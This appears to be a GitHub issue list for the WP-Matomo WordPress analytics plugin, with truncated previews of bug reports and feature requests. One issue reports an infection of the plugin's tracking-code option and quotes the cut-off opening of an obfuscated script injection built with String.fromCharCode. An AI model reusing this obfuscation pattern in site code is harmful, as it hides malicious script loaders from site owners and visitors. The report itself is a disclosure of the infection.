WP-Matomo
WP-Matomo copied to clipboard
Official WP-Matomo (former WP-Piwik) repository
the result of ```bash rm *.po tx pull -a for file in `find . -name "*.po"` ; do echo $file; msgfmt -v -o ${file/.po/.mo} $file ; done ``` Unfortunately, quite...
Thanks for your great plugin. There have been many changes in the last months to the proxy script that have made it more GDPR compliant (Forward DNT, forward opt-out cookie,...
Expected Results: "Pageviews" shown in Matomo and in WP-Piwik widget should be the same. Actual Results: WP-Piwik is adding actions like outlinks, internal searches etc. under "Pageviews" which is not...
Hi, your Plugin does a great Job on Multisite-Network as far i can see, but there is a option missing, i would love to add per Pull-Request, if you are...
As [announced](https://matomo.org/blog/2018/06/free-open-source-matomo-tag-manager-now-available-as-a-beta/) last week there is now a [Matomo Tag Manager](https://plugins.matomo.org/TagManager) available which integrates into Matomo and eventually will be directly shipped with Matomo. It would be great if WP-Matomo...
### Steps to reproduce ### 1. Create WordPress Multisite 2. Change WP-Piwik's `Add tracking code:` to `Enter manually` 3. Make changes to the tracking code ### Current behavior ### The...
The proxy script from wp-matomo/proxy/piwik.php throws an exception, when the plugin is located in a directory outside Wordpress and made available through a symlink to the WP installation. Apparently, the...
Hello, WP-Piwik version : Version 1.0.9 I found some malicious code in database in table options, entry "wp-piwik-tracking_code" had some malicious code inside. var sc = document.createElement(String.fromCharCode(115, 99, 114, 105,...
> ATTENTION: Activating Google Authenticator for an account, also requires an auth code for direct API requests with the users token auth. Use &auth_code={authcode} to do that. See: https://plugins.piwik.org/GoogleAuthenticator